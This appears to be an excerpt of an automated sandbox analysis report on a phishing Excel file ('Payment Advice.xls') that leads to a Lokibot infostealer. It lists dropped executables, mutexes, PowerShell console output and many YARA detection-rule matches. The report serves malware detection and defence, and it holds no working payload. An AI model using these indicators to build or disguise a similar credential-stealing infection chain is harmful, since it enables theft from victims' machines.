                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_003827F711_2_003827F7
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_0038D9D811_2_0038D9D8
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_0038CAF811_2_0038CAF8
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_0038BD4011_2_0038BD40
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 11_2_00381F6811_2_00381F68
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003A04C021_2_003A04C0
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003A280821_2_003A2808
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003A108F21_2_003A108F
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003A10DA21_2_003A10DA
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003AC17821_2_003AC178
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003AC5B021_2_003AC5B0
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003AD9D821_2_003AD9D8
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003ACAF821_2_003ACAF8
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 21_2_003ABD4021_2_003ABD40
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 28_2_0040549C28_2_0040549C
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 28_2_004029D428_2_004029D4
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_003704C037_2_003704C0
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_0037280837_2_00372808
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_003710D237_2_003710D2
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_0037C17837_2_0037C178
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_0037C5B037_2_0037C5B0
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_0037D9D837_2_0037D9D8
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_0037CAF837_2_0037CAF8
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_0037BD4037_2_0037BD40
                    Source: C:\Users\user\AppData\Roaming\caspol.exeCode function: 37_2_00371F6837_2_00371F68
                    Source: Payment Advice.xlsOLE indicator, VBA macros: true
                    Source: tmpAAE0.tmp.11.drOLE indicator, VBA macros: true
                    Source: tmpDCB9.tmp.21.drOLE indicator, VBA macros: true
                    Source: tmp1F44.tmp.37.drOLE indicator, VBA macros: true
                    Source: ~DF6CCF4596F2406470.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: tmpAAE0.tmp.11.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: tmpDCB9.tmp.21.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: tmp1F44.tmp.37.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: String function: 0041219C appears 45 times
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: String function: 00405B6F appears 42 times
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: C:\Users\user\AppData\Roaming\caspol.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 11.2.caspol.exe.3529c50.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 11.2.caspol.exe.350fc30.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: Process Memory Space: caspol.exe PID: 3888, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1644, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: caspol.exe PID: 4076, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: caspol[1].exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: caspol.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: rrwscqkDSNwLK.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.csSecurity API names: _0020.SetAccessControl
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.csSecurity API names: _0020.AddAccessRule
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, zHSLcC0xi2VDKUoIki.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@52/60@3/3
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: 28_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,28_2_0040434D
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\CA430000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                    Source: C:\Users\user\AppData\Roaming\caspol.exeMutant created: \Sessions\1\BaseNamedObjects\otkaVhUbioxCcU
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9FF6.tmpJump to behavior
                    Source: Payment Advice.xlsOLE indicator, Workbook stream: true
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drOLE indicator, Workbook stream: true
                    Source: CA430000.0.drOLE indicator, Workbook stream: true
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Pp.............0.........................................................,..............3......................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(..............................}..w.............................1......(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................Pp.............................}..w.............................1......(.P..............3......................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cmp.......................xk....}..w............\.......................(.P.....................X...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w.............!j.....o.xk......i.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cmp.......................xk....}..w............\.......................(.P.....................X...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w.............!j.....o.xk......i.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..!j.....o.xk......i.....(.P............................. .......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.e.V.i.C.e.c.R.e.D.e.n.T.I.a.l.d.E.p.L.O.y.m.e.n.t.(.P.............................8.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................Jump to behavior
